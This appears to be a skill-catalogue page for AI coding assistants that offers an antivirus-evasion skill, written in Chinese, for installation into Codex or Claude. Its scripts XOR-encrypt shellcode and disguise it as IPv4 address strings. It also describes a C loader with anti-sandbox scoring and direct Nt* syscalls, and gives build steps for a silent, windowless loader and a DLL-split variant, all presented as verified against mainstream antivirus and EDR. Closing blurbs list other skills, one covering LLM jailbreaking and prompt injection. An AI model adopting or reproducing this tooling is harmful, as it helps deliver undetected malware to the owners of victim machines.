원클릭으로
ai-av-evasion-optimized
使用AI生成免杀Loader和处理Shellcode,结合IPv4混淆、XOR加密、反沙箱检测等免杀技术绕过主流杀软检测
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
使用AI生成免杀Loader和处理Shellcode,结合IPv4混淆、XOR加密、反沙箱检测等免杀技术绕过主流杀软检测
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
| category | redteam |
| name | ai-av-evasion-optimized |
| description | 使用AI生成免杀Loader和处理Shellcode,结合IPv4混淆、XOR加密、反沙箱检测等免杀技术绕过主流杀软检测 |
| version | 2.1 |
| date | "2026-04-05T00:00:00.000Z" |
| status | 已验证成功 |
本Skill提供完整的免杀解决方案,包括Shellcode处理和Loader编写,利用AI生成高免杀效果的恶意代码载体,绕过主流杀软和EDR检测。
已验证成功功能:
当需要:
mov rax,0 → xor rax,rax脚本:shellcode-patch.py
#!/usr/bin/env python3
"""
Shellcode Patch工具
功能:对Shellcode进行同义指令替换、花指令注入和指令重排
"""
import sys
def patch_shellcode(shellcode):
# 实现Shellcode Patch逻辑
# 1. 同义指令替换
# 2. 花指令注入
# 3. 指令重排
patched_shellcode = shellcode # 实际实现需要根据具体架构进行处理
return patched_shellcode
def main():
if len(sys.argv) != 2:
print("Usage: python shellcode-patch.py <shellcode_file>")
return
with open(sys.argv[1], 'rb') as f:
shellcode = f.read()
patched = patch_shellcode(shellcode)
with open('shellcode_patched.bin', 'wb') as f:
f.write(patched)
print("Shellcode patched successfully!")
if __name__ == "__main__":
main()
脚本:shellcode-encrypt.py
#!/usr/bin/env python3
"""
Shellcode加密工具
功能:使用自定义加密算法对Shellcode进行加密
"""
import sys
def custom_encrypt(shellcode, key):
# 实现自定义加密算法(XOR)
encrypted = bytearray()
for i, byte in enumerate(shellcode):
encrypted_byte = (byte ^ key[i % len(key)])
encrypted.append(encrypted_byte)
return encrypted
def main():
if len(sys.argv) != 3:
print("Usage: python shellcode-encrypt.py <shellcode_file> <key>")
return
with open(sys.argv[1], 'rb') as f:
shellcode = f.read()
key = sys.argv[2].encode()
encrypted = custom_encrypt(shellcode, key)
# 输出加密后的二进制文件
with open('shellcode_encrypted.bin', 'wb') as f:
f.write(encrypted)
# 同时生成C语言数组格式供参考
c_array = "unsigned char shellcode[] = {" + ",".join([f"0x{byte:02x}" for byte in encrypted]) + "};"
with open('shellcode_encrypted.c', 'w') as f:
f.write(c_array)
print("Shellcode encrypted successfully!")
if __name__ == "__main__":
main()
⚠️ 重要:UUID方案失败原因
UuidFromStringA函数字节序与Python的uuid.UUID不一致脚本:shellcode-obfuscate-ipv4.py
#!/usr/bin/env python3
"""
Shellcode IPv4混淆工具
功能:将Shellcode伪装成IPv4地址数组
"""
import sys
def obfuscate_as_ipv4(shellcode):
# 将Shellcode每4字节转换为一个IPv4地址
ipv4_list = []
for i in range(0, len(shellcode), 4):
chunk = shellcode[i:i+4]
if len(chunk) < 4:
chunk = chunk.ljust(4, b'\x00')
# 直接按字节顺序转换:chunk[0].chunk[1].chunk[2].chunk[3]
ipv4 = f"{chunk[0]}.{chunk[1]}.{chunk[2]}.{chunk[3]}"
ipv4_list.append(ipv4)
return ipv4_list
def main():
if len(sys.argv) != 2:
print("Usage: python shellcode-obfuscate-ipv4.py <shellcode_file>")
return
with open(sys.argv[1], 'rb') as f:
shellcode = f.read()
ipv4_list = obfuscate_as_ipv4(shellcode)
# 生成C语言数组格式
c_array = "char* ipv4_array[] = {" + ",".join([f'"{ip}"' for ip in ipv4_list]) + "};"
with open('shellcode_obfuscated_ipv4.c', 'w') as f:
f.write(c_array)
print(f"Shellcode obfuscated as IPv4 successfully! Total: {len(ipv4_list)} IPs")
if __name__ == "__main__":
main()
关键特性:
完整代码见:scripts/loader_full.c
6层检测(综合评分≥3项才判定沙箱):
CPU核心数检测
内存大小检测
虚拟机进程检测
用户交互检测
5分钟无输入判定为沙箱
调试器检测
时间延迟检测(新增)
评分机制优势:
绕过的API:
NtAllocateVirtualMemory 替代 VirtualAllocNtWriteVirtualMemory 替代 WriteProcessMemoryNtCreateThreadEx 替代 CreateThread优势:
gcc -o loader.exe loader_full.c -lpsapi
生成:PE32+ executable (console) - 有黑色命令行窗口
gcc -mwindows -o loader_final.exe loader_full.c -lpsapi
生成:PE32+ executable (GUI) - 无窗口静默运行
shellcodes_raws.bin文件(64位)# 步骤1: Patch Shellcode
cd scripts/
python shellcode-patch.py ../shellcodes_raws.bin
# 步骤2: 加密Shellcode
python shellcode-encrypt.py shellcode_patched.bin mysecretkey
# 步骤3: IPv4混淆
python shellcode-obfuscate-ipv4.py shellcode_encrypted.bin
shellcode_obfuscated_ipv4.c中的IPv4数组loader_full.c中的ipv4_array[]SHELLCODE_SIZE正确(默认:510字节)shellcode_obfuscated_ipv4.c中的IPv4数组payload_dll.c中的ipv4_array[]优势对比:
# 无窗口版本
gcc -mwindows -o loader_final.exe loader_full.c -lpsapi
# 或带窗口版本(调试用)
gcc -o loader.exe loader_full.c -lpsapi
# 步骤1: 编译Payload DLL
gcc -shared -o helper.dll payload_dll.c
# 步骤2: 编译Loader
gcc -mwindows -o loader_final.exe loader_dll.c -lpsapi
# 可选:修改DLL名称(避免固定特征)
# 在loader_dll.c中修改LoadLibraryA参数,如改为"config.dll"、"data.dll"等
# 编译时同步修改DLL输出名称
loader_final.exe(无窗口)helper.dll 和 loader_final.exe 在同一目录loader_final.exe(无窗口)| 文件 | 大小 | 类型 | 功能 | 状态 |
|---|---|---|---|---|
| loader_raw.exe | 54KB | Console | 直接加载原始Shellcode | ✅成功 |
| test_decrypt.exe | 54KB | Console | XOR解密测试 | ✅成功 |
| loader_ipv4.exe | 59KB | Console | IPv4混淆+解密 | ✅成功 |
| loader_full.exe | 63KB | Console | 完整功能(含反沙箱,数据内嵌) | ✅成功 |
| loader_final.exe (内嵌版) | 63KB | GUI | 完整功能+无窗口 | ✅成功 |
| loader_dll.exe + helper.dll | 61KB+42KB | GUI+DLL | DLL分离加载+完整功能 | ✅成功 |
原因: Windows UuidFromStringA字节序与Python uuid.UUID不一致 解决: 改用IPv4混淆方案,直接按字节顺序转换
原因: 检测逻辑有误(如检测不存在的文件) 解决: 采用综合评分机制,需≥3项才判定沙箱
排查步骤:
test_decrypt.exe 验证解密正确性原因: Loader编译架构与Shellcode架构不一致 解决:
原因: 编译为Console程序
解决: 使用 -mwindows 参数编译为GUI程序
scripts/shellcode-patch.py - Shellcode Patch工具scripts/shellcode-encrypt.py - XOR加密工具scripts/shellcode-obfuscate-ipv4.py - IPv4混淆工具(推荐)scripts/shellcode-obfuscate.py - UUID混淆工具(已弃用)scripts/loader_raw.c - 最简版本(直接加载)scripts/test_decrypt.c - XOR解密测试scripts/loader_ipv4.c - IPv4混淆版本scripts/loader_full.c - 完整功能版本(数据内嵌)scripts/loader_dll.c - DLL分离加载版本(推荐,静态免杀更优)scripts/payload_dll.c - Payload数据DLL源码scripts/helper.dll - 编译后的Payload DLL(可改名)shellcode_patched.bin - Patch后的Shellcodeshellcode_encrypted.bin - 加密后的Shellcodeshellcode_encrypted.c - 加密后的C数组格式shellcode_obfuscated_ipv4.c - IPv4混淆数组-mwindows 编译为GUI程序v2.1 (2026-04-05)
v2.0 (2026-04-04)
v1.0 (原始SKILL.md)
最后更新:2026-04-04 状态:已验证成功 测试环境:Windows 10 Pro x64
Security audit workflow for authorized Java, .NET, PHP source and deployment artifact review.
Professional code security audit skill covering 55+ vulnerability types. Enhanced with WooYun 88,636 real-world vulnerability cases (2010-2016). This skill should be used when performing security audits, vulnerability scanning, penetration testing preparation, or code review for security issues. Supports 9 languages: Java, Python, Go, PHP, JavaScript/Node.js, C/C++, .NET/C#, Ruby, Rust. Includes 143 mandatory detection items across all languages with language-specific checklists. Covers SQL injection, XSS, RCE, deserialization, SSRF, JNDI injection, JDBC protocol injection, authentication bypass, business logic flaws, race conditions, and modern security domains (LLM, Serverless, Android). WooYun integration adds: statistical-driven parameter priority, bypass techniques library, logic vulnerability patterns, and real-case references. v1.0: Initial public release with Docker deployment verification framework.
Comprehensive code review guidance across frontend, backend, systems, architecture, quality, performance, and security.
Provides AI and machine learning techniques for CTF challenges. Use when attacking ML models, crafting adversarial examples, performing model extraction, prompt injection, membership inference, training data poisoning, fine-tuning manipulation, neural network analysis, LoRA adapter exploitation, LLM jailbreaking, or solving AI-related puzzles.
Provides cryptography attack techniques for CTF challenges. Use when attacking encryption, hashing, signatures, ZKP, PRNG, or mathematical crypto problems involving RSA, AES, ECC, lattices, LWE, CVP, number theory, Coppersmith, Pollard, Wiener, padding oracle, GCM, key derivation, or stream/block cipher weaknesses.
Provides digital forensics and signal analysis techniques for CTF challenges. Use when analyzing disk images, memory dumps, event logs, network captures, cryptocurrency transactions, steganography, PDF analysis, Windows registry, Volatility, PCAP, Docker images, coredumps, side-channel power traces, DTMF audio spectrograms, packet timing analysis, CD audio disc images, or recovering deleted files and credentials.